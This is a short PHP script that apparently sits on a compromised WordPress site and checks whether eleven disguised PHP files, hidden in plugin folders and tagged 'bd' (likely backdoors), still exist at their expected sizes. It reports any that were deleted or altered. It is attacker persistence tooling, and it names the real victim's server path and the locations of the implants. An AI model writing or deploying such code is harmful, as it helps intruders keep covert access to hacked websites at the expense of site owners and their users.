<?php $r = '/home/pndpeesp/careformelebanon.com'; $x = ["/wp-content/plugins/kirki/kirki-packages/control-react-colorful/src/Field/CSS/annoucement.php"=>"bd@@64847@@941",
"/wp-content/plugins/extendify/app/Shared/Services/PluginDependencies/Forms/details.php"=>"bd@@64364@@954",
"/wp-content/plugins/kirki/pro-src/packages/kirki-pro-tabs/src/Control/configitem.php"=>"bd@@64649@@949",
"/wp-content/plugins/kirki/pro-src/packages/kirki-pro-responsive/vendor/Download.php"=>"bd@@91537@@922",
"/wp-content/plugins/kirki/pro-src/packages/kirki-pro-input-slider/vendor/composer/autoload.check.php"=>"bd@@91297@@1010",
"/wp-content/plugins/kirki/kirki-packages/control-repeater/src/Field/contentcache.php"=>"bd@@65442@@984",
"/wp-content/plugins/loginizer/assets/images/order_history.php"=>"bd@@51642@@956",
"/wp-content/plugins/kirki/kirki-packages/control-sortable/src/Control/404SEF_cpanel.php"=>"bd@@185036@@915",
"/wp-content/plugins/kirki/kirki-packages/util/src/Setting/Site.Option.php"=>"bd@@185040@@915",
"/wp-content/plugins/kirki/kirki-packages/field-background/src/CSS/ajobpost.php"=>"bd@@185045@@1025",
"/wp-content/plugins/kirki/kirki-packages/control-sortable/src/Field/publicphoto.php"=>"bd@@65018@@911"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');